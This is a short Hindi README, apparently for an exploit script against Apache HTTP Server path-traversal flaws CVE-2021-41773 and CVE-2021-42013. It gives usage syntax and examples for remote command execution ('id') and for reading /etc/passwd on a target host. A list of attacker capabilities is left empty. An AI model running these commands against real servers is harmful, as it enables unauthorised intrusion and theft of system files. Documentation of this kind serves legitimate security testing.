
CVE-2021-41773 और CVE-2021-42013
ये गंभीर पाथ ट्रैवर्सल भेद्यताएँ हैं जो Apache HTTP Server 2.4.49 और 2.4.50 को प्रभावित करती हैं।
ये हमलावरों को निम्न की अनुमति देती हैं:
दोनों भेद्यताएँ Apache 2.4.51 में पैच की गई हैं।
तत्काल अपग्रेड करने की दृढ़ता से अनुशंसा की जाती है।
python3 exploit.py --url <TARGET> --port [PORT] (--rce --command "COMMAND" | --lfi --path "/path/to/file")
उदाहरण
python3 exploit.py --url http://192.168.1.10 --rce --command "id"

python3 exploit.py --url http://192.168.1.10 --lfi --path "/etc/passwd"

यह एक्सप्लॉइट स्क्रिप्ट केवल अधिकृत सुरक्षा परीक्षण, रक्षात्मक अनुसंधान और शैक्षिक उद्देश्यों के लिए है।